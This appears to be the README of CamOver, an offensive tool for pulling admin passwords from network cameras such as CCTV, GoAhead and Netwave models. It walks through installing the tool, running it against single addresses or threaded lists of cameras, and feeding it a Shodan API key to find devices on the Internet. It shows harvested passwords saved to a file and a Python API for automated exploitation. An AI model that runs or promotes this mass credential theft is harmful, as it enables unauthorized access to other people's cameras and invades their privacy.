Projects STRLCPY CamOver Files
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CamOver is a camera exploitation tool that allows to disclosure network camera admin password.


  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.


pip3 install git+

Basic usage

To use CamOver just type camover in your terminal.

usage: camover [-h] [--threads] [--output OUTPUT] [--input INPUT]
               [--address ADDRESS] [--api API]

CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.

optional arguments:
  -h, --help         show this help message and exit
  --threads          Use threads for fastest work.
  --output OUTPUT    Output result to file.
  --input INPUT      Input file of addresses.
  --address ADDRESS  Single address.
  --api API          Shodan API key for exploiting devices over Internet.


Let's hack my camera just for fun.

camover --address


[*] ( - connecting to device...
[*] ( - accessing device rom...
[*] ( - extracting admin password...
[i] ( - password: mamahacker123

Let's try to use opened database of hosts with --threads for fast exploitation.

camover --threads --input cameras.txt --output passwords.txt

It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.


[*] Initializing thread #0...
[*] (x.x.x.x) - connecting to camera...
[*] Initializing thread #1...
[*] (x.x.x.x) - connecting to camera...
[*] Initializing thread #2...
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting admin password...
[i] Thread #0 completed.
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting admin password...
[i] Thread #1 completed.
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting admin password...
[i] Thread #2 completed.

CamOver API

CamOver also has their own Python API that can be invoked by importing CamOver to your code:

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified device.

  • connect(host) - Connect specified defice by network address.
  • exploit(device) - Exploit connected device.


from camover import CamOver

camover = CamOver()

camera = camover.connect('')


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